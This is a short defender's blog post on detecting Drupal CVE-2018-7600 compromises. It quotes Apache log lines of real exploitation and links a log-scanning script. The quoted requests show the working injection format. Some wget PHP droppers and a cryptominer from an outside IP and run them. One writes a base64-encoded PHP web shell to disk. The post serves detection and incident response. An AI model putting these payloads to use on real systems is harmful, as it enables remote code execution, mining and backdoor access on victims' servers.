Searching for Drupal CVE-2018-7600 Compromises

So If you haven’t heard the news the Drupal Core Team released a critical patch back in March to close a Remote Code Execution vulnerability. In the beginning of April scanning started and POC’s exploits became available. At this time if you have not patched your Drupal install there is a HIGH probability that you have been compromised.

The scans probing for possible targets look like the following:

93.56.61.232 - - [17/Apr/2018:04:35:27 -0400] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 13074 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Now we have some data on what a successful compromise looks like:

185.212.128.77 - - [18/Apr/2018:13:48:51 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [18/Apr/2018:13:48:53 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/l.php+http://193.201.224.233/l.txt?l1;chmod+777+/tmp/l.php;sed+-i+'s/ptptpt/\"\\/home\\/example\\/public_html\"/g'+/tmp/l.php;php+-f+/tmp/l.php > /dev/null 2>&1 &;rm+-f+/tmp/l.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [18/Apr/2018:13:49:16 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [18/Apr/2018:13:49:18 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/m.php+http://193.201.224.233/m.txt?l1;chmod+777+/tmp/m.php;sed+-i+'s/ptptpt/\"\\/home\\/example\\/public_html\"/g'+/tmp/m.php;php+-f+/tmp/m.php > /dev/null 2>&1 &;rm+-f+/tmp/m.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [18/Apr/2018:13:49:33 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=cd+/tmp;wget+-O+xm111+http://193.201.224.233/xm111;chmod+777+xm111;wget+-O+config.json+http://193.201.224.233/m.json;chmod+777+config.json;./xm111 > /dev/null 2>&1 & HTTP/1.1" 200 8745 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [20/Apr/2018:06:10:54 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [20/Apr/2018:06:10:55 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/l.php+http://193.201.224.233/l.txt?l1;chmod+777+/tmp/l.php;sed+-i+'s/ptptpt/\"\\/home\\/example\\/public_html\"/g'+/tmp/l.php;php+-f+/tmp/l.php > /dev/null 2>&1 &;rm+-f+/tmp/l.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [20/Apr/2018:06:11:20 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [20/Apr/2018:06:11:21 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/m.php+http://193.201.224.233/m.txt?l1;chmod+777+/tmp/m.php;sed+-i+'s/ptptpt/\"\\/home\\/example\\/public_html\"/g'+/tmp/m.php;php+-f+/tmp/m.php > /dev/null 2>&1 &;rm+-f+/tmp/m.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"

In the logs you can see the commands being entered into the exploit. Other times we will see obfuscated command injections:

82.209.182.92 - - [19/Apr/2018:03:29:35 -0400] "POST /user/password?name[%23post_render][0]=system&name%5B%23markup%5D=echo+PD9waHAgZWNobyA3NDU3NzM3KzczNjcyMzskcmFQb19yWmx1b0U9YmFzZTY0X2RlY29kZSgiWSIuY2hyKDEwOSkuIkYiLmNocigxMjIpLmNocig5MCkuIlQiLmNocig4OSkuY2hyKDQ4KS5jaHIoODgpLiIyIi4iUiIuImwiLiJZIi5jaHIoNTApLiI5Ii5jaHIoMTA3KS4iWiIuY2hyKDgxKS4iPSIuIj0iKTskeWRTSlB0bndyU3Y9YmFzZTY0X2RlY29kZShjaHIoODkpLiIyIi5jaHIoNTcpLmNocigxMTkpLmNocigxMDEpLmNocig4MSkuY2hyKDYxKS4iPSIpO2V2YWwoJHJhUG9fclpsdW9FKCRfUE9TVFtiYXNlNjRfZGVjb2RlKGNocig5NykuY2hyKDg3KS4iUSIuY2hyKDYxKSldKSk7aWYoJF9QT1NUW2Jhc2U2NF9kZWNvZGUoImQiLmNocig4OCkuY2hyKDY1KS4iPSIpXSA9PSBiYXNlNjRfZGVjb2RlKCJkIi4iWCIuY2hyKDY1KS5jaHIoNjEpKSl7QCR5ZFNKUHRud3JTdigkX0ZJTEVTW2Jhc2U2NF9kZWNvZGUoY2hyKDkwKS4ibSIuImwiLiJzIi5jaHIoOTApLiJRIi4iPSIuY2hyKDYxKSldW2Jhc2U2NF9kZWNvZGUoY2hyKDEwMCkuY2hyKDcxKS5jaHIoNDkpLiJ3Ii4iWCIuY2hyKDUwKS4iNSIuY2hyKDEwNCkuImIiLmNocig4NykuIlUiLmNocig2MSkpXSwkX0ZJTEVTW2Jhc2U2NF9kZWNvZGUoIloiLmNocigxMDkpLiJsIi4icyIuY2hyKDkwKS4iUSIuY2hyKDYxKS5jaHIoNjEpKV1bYmFzZTY0X2RlY29kZShjaHIoOTgpLiJtIi4iRiIuY2hyKDExNikuIloiLmNocig4MSkuY2hyKDYxKS4iPSIpXSk7fTsgPz4%3D%7C+base64+--decode%7C+tee+accesson.php HTTP/1.1" 200 16453 "http://example.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2788.88 Safari/537.36"

Based on indicators of this command style injection I’ve whipped up a quick tool to quickly dive the Apache logs and present the relevant information:

https://github.com/Hestat/drupal-check

Feel free to clone from github or:

wget https://raw.githubusercontent.com/Hestat/drupal-check/master/drupal-check.sh

Currently configured based on Cpanel setups, or vanilla Apache installs. Have questions of data you’d like to share based on your logs? Find me on twitter @laskow26